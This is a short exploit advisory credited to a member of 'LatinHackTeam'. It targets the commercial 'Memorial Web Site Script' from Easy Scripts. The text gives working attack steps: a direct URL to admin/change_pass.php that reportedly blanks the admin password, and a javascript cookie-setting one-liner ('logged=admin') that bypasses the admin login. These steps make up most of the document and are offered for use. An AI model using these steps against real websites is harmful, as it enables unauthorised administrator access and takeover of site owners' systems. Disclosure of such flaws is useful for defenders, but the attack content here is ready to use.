-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
-----------------------------------------------------------------------
Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Where : From Remote
Group : LatinHackTeam
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Memorial Web Site Script
Author : Easy Scripts
Price : $49
Vendor : http://www.easy-scripts.net
description Bug:
~~~~~~~~~~~~~~~
To reset the password just use this:
http://127.0.0.1/[path]/admin/change_pass.php
so the password will be null, login with single user can
admin:
http://127.0.0.1/[path]/admin/
--------------------------
Insecure Cookie Handling
exploit:
javascript:document.cookie="logged=admin;path=/";
http://127.0.0.1/[path]/admin/
--------------------------
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++